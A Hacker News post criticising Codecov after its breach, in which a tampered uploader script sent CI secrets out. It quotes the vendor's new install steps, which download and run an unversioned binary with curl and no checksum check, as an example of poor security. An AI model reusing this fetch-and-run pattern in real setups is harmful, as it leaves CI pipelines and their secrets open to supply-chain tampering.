Tell HN: Codecov learned nothing from their security breach

4 points

5 years ago

See https://about.codecov.io/blog/introducing-codecovs-new-uploader/

I'm just stumped by the stupidity of Codecov.

Codecov's security breach involved someone gaining access to their repo, modifying the bash uploader script to -- apart from uploading code coverage reports -- also upload all (secret) environment variables set by the CI pipeline. This affected many people.

Apart from discovering this months too late, their initial "mitigation" was to do checksum validation on the bash upload script. However, they failed to understand how that works, as they downloaded the checksum from the same URL the bash script was downloaded from. [1]

Now they released a new "uploader" where the blog post mentions:

> A compiled binary makes it more difficult for code to be modified by a middle man.

which only proves their stupidity. Clearly you can replace the binary with a binary that calls the original binary and steals CI secrets too.

And their installation instructions from the blog post are as follows:

    curl -Os https://uploader.codecov.io/latest/linux/codecov 
    chmod +x codecov
    ./codecov -t ${CODECOV_TOKEN}

That is: a non-versioned URL, and no checksum verification. No lessons learned.

How is this company still in business?

[1] https://github.com/codecov/codecov-action/pull/282#issuecomment-823195201

1 comment